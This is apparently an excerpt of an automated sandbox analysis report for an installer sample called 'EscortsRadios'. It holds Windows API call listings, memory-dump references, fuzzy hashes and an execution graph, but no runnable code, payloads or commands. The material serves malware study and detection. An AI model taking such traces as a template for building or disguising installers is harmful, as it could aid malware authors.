                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: lstrcpyn$CreateFilelstrcmp
                                                  • String ID: Version
                                                  • API String ID: 512980652-315105994
                                                  • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                  • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                  • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                  • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                  • GetTickCount.KERNEL32 ref: 00403303
                                                  • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                  • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                  • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                  • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                  • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                  • String ID:
                                                  • API String ID: 2883127279-0
                                                  • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                  • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                  • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                  • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                  APIs
                                                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                  • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringlstrcmp
                                                  • String ID: !N~
                                                  • API String ID: 623250636-529124213
                                                  • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                  • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                  • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                  • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                  APIs
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                  • CloseHandle.KERNEL32(?), ref: 00405C71
                                                  Strings
                                                  • Error launching installer, xrefs: 00405C48
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                  • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                  • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                  • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                  APIs
                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: CloseHandlelstrlenwvsprintf
                                                  • String ID: RMDir: RemoveDirectory invalid input("")
                                                  • API String ID: 3509786178-2769509956
                                                  • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                  • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                  • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                  • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                  • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                  • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                  • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                  • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                  • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                  • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                  Execution Graph

                                                  Execution Coverage:4%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:2.2%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:76
                                                  execution_graph 99746 f99a88 99749 f986e0 99746->99749 99750 f986fd 99749->99750 99751 fd0fad 99750->99751 99752 fd0ff8 99750->99752 99773 f98724 99750->99773 99755 fd0fb5 99751->99755 99758 fd0fc2 99751->99758 99751->99773 99784 100aad0 298 API calls __cinit 99752->99784 99753 f95278 59 API calls 99753->99773 99782 100b0e4 298 API calls 99755->99782 99756 fb2f70 __cinit 67 API calls 99756->99773 99774 f9898d 99758->99774 99783 100b58c 298 API calls 3 library calls 99758->99783 99759 f93f42 68 API calls 99759->99773 99762 fd1289 99762->99762 99763 fd11af 99787 100ae3b 89 API calls 99763->99787 99766 f98a17 99767 f939be 68 API calls 99767->99773 99772 f93c30 68 API calls 99772->99773 99773->99753 99773->99756 99773->99759 99773->99763 99773->99766 99773->99767 99773->99772 99773->99774 99775 f953b0 298 API calls 99773->99775 99776 fa1c9c 59 API calls 99773->99776 99778 f93938 68 API calls 99773->99778 99779 f9855e 298 API calls 99773->99779 99780 f984e2 89 API calls 99773->99780 99781 f9835f 298 API calls 99773->99781 99785 f9523c 59 API calls 99773->99785 99786 fe73ab 59 API calls 99773->99786 99774->99766 99788 ffa48d 89 API calls 4 library calls 99774->99788 99775->99773 99776->99773 99778->99773 99779->99773 99780->99773 99781->99773 99782->99758 99783->99774 99784->99773 99785->99773 99786->99773 99787->99774 99788->99762 98079 f9107d 98084 fa2fc5 98079->98084 98081 f9108c 98115 fb2f70 98081->98115 98085 fa2fd5 __write_nolock 98084->98085 98118 fa1207 98085->98118 98089 fa3094 98130 fb08c1 98089->98130 98096 fa1207 59 API calls 98097 fa30c5 98096->98097 98149 fa19e1 98097->98149 98099 fa30ce RegOpenKeyExW 98100 fe01a3 RegQueryValueExW 98099->98100 98104 fa30f0 Mailbox 98099->98104 98101 fe0235 RegCloseKey 98100->98101 98102 fe01c0 98100->98102 98101->98104 98114 fe0247 _wcscat Mailbox __NMSG_WRITE 98101->98114 98153 fb0fe6 98102->98153 98104->98081 98105 fe01d9 98163 fa433f 98105->98163 98108 fa1609 59 API calls 98108->98114 98109 fe0201 98166 fa1821 98109->98166 98111 fe021b 98111->98101 98113 fa4c94 59 API calls 98113->98114 98114->98104 98114->98108 98114->98113 98175 fa1a36 98114->98175 98240 fb2e74 98115->98240 98117 f91096 98119 fb0fe6 Mailbox 59 API calls 98118->98119 98120 fa1228 98119->98120 98121 fb0fe6 Mailbox 59 API calls 98120->98121 98122 fa1236 98121->98122 98123 fb00cf 98122->98123 98179 fc1b70 98123->98179 98126 fa1a36 59 API calls 98127 fb0102 98126->98127 98181 fb0284 98127->98181 98129 fb010c Mailbox 98129->98089 98131 fc1b70 __write_nolock 98130->98131 98132 fb08ce GetFullPathNameW 98131->98132 98133 fb08f0 98132->98133 98134 fa1821 59 API calls 98133->98134 98135 fa309f 98134->98135 98136 fa1900 98135->98136 98137 fdf534 98136->98137 98138 fa1914 98136->98138 98208 fa1c7e 98137->98208 98203 fa18a5 98138->98203 98141 fa191f 98143 fa4c94 98141->98143 98142 fdf53f __NMSG_WRITE _memmove 98144 fa4ca2 98143->98144 98148 fa4cc4 _memmove 98143->98148 98146 fb0fe6 Mailbox 59 API calls 98144->98146 98145 fb0fe6 Mailbox 59 API calls 98147 fa30bc 98145->98147 98146->98148 98147->98096 98148->98145 98150 fa19fb 98149->98150 98151 fa19ee 98149->98151 98152 fb0fe6 Mailbox 59 API calls 98150->98152 98151->98099 98152->98151 98156 fb0fee 98153->98156 98155 fb1008 98155->98105 98156->98155 98158 fb100c std::exception::exception 98156->98158 98211 fb593c 98156->98211 98228 fb35d1 DecodePointer 98156->98228 98229 fb87cb RaiseException 98158->98229 98160 fb1036 98230 fb8701 58 API calls _free 98160->98230 98162 fb1048 98162->98105 98164 fb0fe6 Mailbox 59 API calls 98163->98164 98165 fa4351 RegQueryValueExW 98164->98165 98165->98109 98165->98111 98167 fa189a 98166->98167 98168 fa182d __NMSG_WRITE 98166->98168 98169 fa1981 59 API calls 98167->98169 98170 fa1868 98168->98170 98171 fa1843 98168->98171 98174 fa184b _memmove 98169->98174 98173 fa1c7e 59 API calls 98170->98173 98239 fa1b7c 59 API calls Mailbox 98171->98239 98173->98174 98174->98111 98176 fa1a45 __NMSG_WRITE _memmove 98175->98176 98177 fb0fe6 Mailbox 59 API calls 98176->98177 98178 fa1a83 98177->98178 98178->98114 98180 fb00dc GetModuleFileNameW 98179->98180 98180->98126 98182 fc1b70 __write_nolock 98181->98182 98183 fb0291 GetFullPathNameW 98182->98183 98184 fb02cd 98183->98184 98185 fb02b0 98183->98185 98187 fa19e1 59 API calls 98184->98187 98186 fa1821 59 API calls 98185->98186 98188 fb02bc 98186->98188 98187->98188 98191 fa133d 98188->98191 98192 fa134b 98191->98192 98195 fa1981 98192->98195 98194 fa135b 98194->98129 98196 fa1998 _memmove 98195->98196 98197 fa198f 98195->98197 98196->98194 98197->98196 98199 fa1aa4 98197->98199 98200 fa1ab7 98199->98200 98202 fa1ab4 _memmove 98199->98202 98201 fb0fe6 Mailbox 59 API calls 98200->98201 98201->98202 98202->98196 98204 fa18b4 __NMSG_WRITE 98203->98204 98205 fa18c5 _memmove 98204->98205 98206 fa1c7e 59 API calls 98204->98206 98205->98141 98207 fdf4f1 _memmove 98206->98207 98209 fb0fe6 Mailbox 59 API calls 98208->98209 98210 fa1c88 98209->98210 98210->98142 98212 fb59b7 98211->98212 98223 fb5948 98211->98223 98237 fb35d1 DecodePointer 98212->98237 98214 fb59bd 98238 fb8d58 58 API calls __getptd_noexit 98214->98238 98217 fb597b RtlAllocateHeap 98217->98223 98227 fb59af 98217->98227 98219 fb59a3 98235 fb8d58 58 API calls __getptd_noexit 98219->98235 98223->98217 98223->98219 98224 fb59a1 98223->98224 98225 fb5953 98223->98225 98234 fb35d1 DecodePointer 98223->98234 98236 fb8d58 58 API calls __getptd_noexit 98224->98236 98225->98223 98231 fba39b 58 API calls 2 library calls 98225->98231 98232 fba3f8 58 API calls 7 library calls 98225->98232 98233 fb32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98225->98233 98227->98156 98228->98156 98229->98160 98230->98162 98231->98225 98232->98225 98234->98223 98235->98224 98236->98227 98237->98214 98238->98227 98239->98174 98241 fb2e80 __tzset_nolock 98240->98241 98248 fb3447 98241->98248 98247 fb2ea7 __tzset_nolock 98247->98117 98265 fb9e3b 98248->98265 98250 fb2e89 98251 fb2eb8 DecodePointer DecodePointer 98250->98251 98252 fb2e95 98251->98252 98253 fb2ee5 98251->98253 98262 fb2eb2 98252->98262 98253->98252 98311 fb89d4 59 API calls __vswprintf_l 98253->98311 98255 fb2ef7 98256 fb2f48 EncodePointer EncodePointer 98255->98256 98258 fb2f1c 98255->98258 98312 fb8a94 61 API calls __realloc_crt 98255->98312 98256->98252 98258->98252 98260 fb2f36 EncodePointer 98258->98260 98313 fb8a94 61 API calls __realloc_crt 98258->98313 98260->98256 98261 fb2f30 98261->98252 98261->98260 98314 fb3450 98262->98314 98266 fb9e5f EnterCriticalSection 98265->98266 98267 fb9e4c 98265->98267 98266->98250 98272 fb9ec3 98267->98272 98269 fb9e52 98269->98266 98296 fb32e5 58 API calls 3 library calls 98269->98296 98273 fb9ecf __tzset_nolock 98272->98273 98274 fb9ed8 98273->98274 98275 fb9ef0 98273->98275 98297 fba39b 58 API calls 2 library calls 98274->98297 98284 fb9f11 __tzset_nolock 98275->98284 98300 fb8a4d 58 API calls 2 library calls 98275->98300 98278 fb9edd 98298 fba3f8 58 API calls 7 library calls 98278->98298 98279 fb9f05 98282 fb9f1b 98279->98282 98283 fb9f0c 98279->98283 98281 fb9ee4 98299 fb32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98281->98299 98287 fb9e3b __lock 58 API calls 98282->98287 98301 fb8d58 58 API calls __getptd_noexit 98283->98301 98284->98269 98289 fb9f22 98287->98289 98290 fb9f2f 98289->98290 98291 fb9f47 98289->98291 98302 fba05b InitializeCriticalSectionAndSpinCount 98290->98302 98303 fb2f85 98291->98303 98294 fb9f3b 98309 fb9f63 LeaveCriticalSection _doexit 98294->98309 98297->98278 98298->98281 98300->98279 98301->98284 98302->98294 98304 fb2fb7 _free 98303->98304 98305 fb2f8e RtlFreeHeap 98303->98305 98304->98294 98305->98304 98306 fb2fa3 98305->98306 98310 fb8d58 58 API calls __getptd_noexit 98306->98310 98308 fb2fa9 GetLastError 98308->98304 98309->98284 98310->98308 98311->98255 98312->98258 98313->98261 98317 fb9fa5 LeaveCriticalSection 98314->98317 98316 fb2eb7 98316->98247 98317->98316 98318 fd01f8 98319 fd01fa 98318->98319 98322 ff4d18 SHGetFolderPathW 98319->98322 98323 fa1821 59 API calls 98322->98323 98324 fd0203 98323->98324 99789 f99a6c 99792 f9829c 99789->99792 99791 f99a78 99793 f982b4 99792->99793 99800 f98308 99792->99800 99794 f953b0 298 API calls 99793->99794 99793->99800 99798 f982eb 99794->99798 99796 fd0ed8 99796->99796 99797 f98331 99797->99791 99798->99797 99801 f9523c 59 API calls 99798->99801 99800->99797 99802 ffa48d 89 API calls 4 library calls 99800->99802 99801->99800 99802->99796 99803 fb7e83 99804 fb7e8f __tzset_nolock 99803->99804 99840 fba038 GetStartupInfoW 99804->99840 99806 fb7e94 99842 fb8dac GetProcessHeap 99806->99842 99808 fb7eec 99809 fb7ef7 99808->99809 99925 fb7fd3 58 API calls 3 library calls 99808->99925 99843 fb9d16 99809->99843 99812 fb7efd 99813 fb7f08 __RTC_Initialize 99812->99813 99926 fb7fd3 58 API calls 3 library calls 99812->99926 99864 fbd802 99813->99864 99816 fb7f17 99817 fb7f23 GetCommandLineW 99816->99817 99927 fb7fd3 58 API calls 3 library calls 99816->99927 99883 fc5153 GetEnvironmentStringsW 99817->99883 99820 fb7f22 99820->99817 99823 fb7f3d 99824 fb7f48 99823->99824 99928 fb32e5 58 API calls 3 library calls 99823->99928 99893 fc4f88 99824->99893 99827 fb7f4e 99828 fb7f59 99827->99828 99929 fb32e5 58 API calls 3 library calls 99827->99929 99907 fb331f 99828->99907 99831 fb7f61 99832 fb7f6c __wwincmdln 99831->99832 99930 fb32e5 58 API calls 3 library calls 99831->99930 99913 fa5f8b 99832->99913 99835 fb7f80 99836 fb7f8f 99835->99836 99931 fb3588 58 API calls _doexit 99835->99931 99932 fb3310 58 API calls _doexit 99836->99932 99839 fb7f94 __tzset_nolock 99841 fba04e 99840->99841 99841->99806 99842->99808 99933 fb33b7 36 API calls 2 library calls 99843->99933 99845 fb9d1b 99934 fb9f6c InitializeCriticalSectionAndSpinCount __ioinit 99845->99934 99847 fb9d20 99848 fb9d24 99847->99848 99936 fb9fba TlsAlloc 99847->99936 99935 fb9d8c 61 API calls 2 library calls 99848->99935 99851 fb9d36 99851->99848 99853 fb9d41 99851->99853 99852 fb9d29 99852->99812 99937 fb8a05 99853->99937 99856 fb9d83 99945 fb9d8c 61 API calls 2 library calls 99856->99945 99859 fb9d62 99859->99856 99861 fb9d68 99859->99861 99860 fb9d88 99860->99812 99944 fb9c63 58 API calls 4 library calls 99861->99944 99863 fb9d70 GetCurrentThreadId 99863->99812 99865 fbd80e __tzset_nolock 99864->99865 99866 fb9e3b __lock 58 API calls 99865->99866 99867 fbd815 99866->99867 99868 fb8a05 __calloc_crt 58 API calls 99867->99868 99870 fbd826 99868->99870 99869 fbd891 GetStartupInfoW 99877 fbd8a6 99869->99877 99880 fbd9d5 99869->99880 99870->99869 99871 fbd831 __tzset_nolock @_EH4_CallFilterFunc@8 99870->99871 99871->99816 99872 fbda9d 99959 fbdaad LeaveCriticalSection _doexit 99872->99959 99874 fb8a05 __calloc_crt 58 API calls 99874->99877 99875 fbda22 GetStdHandle 99875->99880 99876 fbda35 GetFileType 99876->99880 99877->99874 99879 fbd8f4 99877->99879 99877->99880 99878 fbd928 GetFileType 99878->99879 99879->99878 99879->99880 99957 fba05b InitializeCriticalSectionAndSpinCount 99879->99957 99880->99872 99880->99875 99880->99876 99958 fba05b InitializeCriticalSectionAndSpinCount 99880->99958 99884 fb7f33 99883->99884 99885 fc5164 99883->99885 99889 fc4d4b GetModuleFileNameW 99884->99889 99960 fb8a4d 58 API calls 2 library calls 99885->99960 99887 fc518a _memmove 99888 fc51a0 FreeEnvironmentStringsW 99887->99888 99888->99884 99890 fc4d7f _wparse_cmdline 99889->99890 99892 fc4dbf _wparse_cmdline 99890->99892 99961 fb8a4d 58 API calls 2 library calls 99890->99961 99892->99823 99894 fc4fa1 __NMSG_WRITE 99893->99894 99898 fc4f99 99893->99898 99895 fb8a05 __calloc_crt 58 API calls 99894->99895 99903 fc4fca __NMSG_WRITE 99895->99903 99896 fc5021 99897 fb2f85 _free 58 API calls 99896->99897 99897->99898 99898->99827 99899 fb8a05 __calloc_crt 58 API calls 99899->99903 99900 fc5046 99902 fb2f85 _free 58 API calls 99900->99902 99902->99898 99903->99896 99903->99898 99903->99899 99903->99900 99904 fc505d 99903->99904 99962 fc4837 58 API calls __vswprintf_l 99903->99962 99963 fb8ff6 IsProcessorFeaturePresent 99904->99963 99906 fc5069 99906->99827 99909 fb332b __IsNonwritableInCurrentImage 99907->99909 99986 fba701 99909->99986 99910 fb3349 __initterm_e 99911 fb2f70 __cinit 67 API calls 99910->99911 99912 fb3368 _doexit __IsNonwritableInCurrentImage 99910->99912 99911->99912 99912->99831 99914 fa6044 99913->99914 99915 fa5fa5 99913->99915 99914->99835 99916 fa5fdf IsThemeActive 99915->99916 99989 fb359c 99916->99989 99920 fa600b 100001 fa5f00 SystemParametersInfoW SystemParametersInfoW 99920->100001 99922 fa6017 100002 fa5240 99922->100002 99924 fa601f SystemParametersInfoW 99924->99914 99925->99809 99926->99813 99927->99820 99931->99836 99932->99839 99933->99845 99934->99847 99935->99852 99936->99851 99939 fb8a0c 99937->99939 99940 fb8a47 99939->99940 99941 fb8a2a 99939->99941 99946 fc5426 99939->99946 99940->99856 99943 fba016 TlsSetValue 99940->99943 99941->99939 99941->99940 99954 fba362 Sleep 99941->99954 99943->99859 99944->99863 99945->99860 99947 fc5431 99946->99947 99953 fc544c 99946->99953 99948 fc543d 99947->99948 99947->99953 99955 fb8d58 58 API calls __getptd_noexit 99948->99955 99950 fc545c HeapAlloc 99951 fc5442 99950->99951 99950->99953 99951->99939 99953->99950 99953->99951 99956 fb35d1 DecodePointer 99953->99956 99954->99941 99955->99951 99956->99953 99957->99879 99958->99880 99959->99871 99960->99887 99961->99892 99962->99903 99964 fb9001 99963->99964 99969 fb8e89 99964->99969 99968 fb901c 99968->99906 99970 fb8ea3 _memset ___raise_securityfailure 99969->99970 99971 fb8ec3 IsDebuggerPresent 99970->99971 99977 fba385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99971->99977 99974 fb8faa 99976 fba370 GetCurrentProcess TerminateProcess 99974->99976 99975 fb8f87 ___raise_securityfailure 99978 fbc826 99975->99978 99976->99968 99977->99975 99979 fbc82e 99978->99979 99980 fbc830 IsProcessorFeaturePresent 99978->99980 99979->99974 99982 fc5b3a 99980->99982 99985 fc5ae9 5 API calls ___raise_securityfailure 99982->99985 99984 fc5c1d 99984->99974 99985->99984 99987 fba704 EncodePointer 99986->99987 99987->99987 99988 fba71e 99987->99988 99988->99910 99990 fb9e3b __lock 58 API calls 99989->99990 99991 fb35a7 DecodePointer EncodePointer 99990->99991 100054 fb9fa5 LeaveCriticalSection 99991->100054 99993 fa6004 99994 fb3604 99993->99994 99995 fb3628 99994->99995 99996 fb360e 99994->99996 99995->99920 99996->99995 100055 fb8d58 58 API calls __getptd_noexit 99996->100055 99998 fb3618 100056 fb8fe6 9 API calls __vswprintf_l 99998->100056 100000 fb3623 100000->99920 100001->99922 100003 fa524d __write_nolock 100002->100003 100004 fa1207 59 API calls 100003->100004 100005 fa5258 GetCurrentDirectoryW 100004->100005 100057 fa4ec8 100005->100057 100007 fa527e IsDebuggerPresent 100008 fa528c 100007->100008 100009 fe0b21 MessageBoxA 100007->100009 100010 fe0b39 100008->100010 100011 fa52a0 100008->100011 100009->100010 100165 fa314d 59 API calls Mailbox 100010->100165 100125 fa31bf 100011->100125 100014 fe0b49 100022 fe0b5f SetCurrentDirectoryW 100014->100022 100021 fa536c Mailbox 100021->99924 100022->100021 100054->99993 100055->99998 100056->100000 100058 fa1207 59 API calls 100057->100058 100059 fa4ede 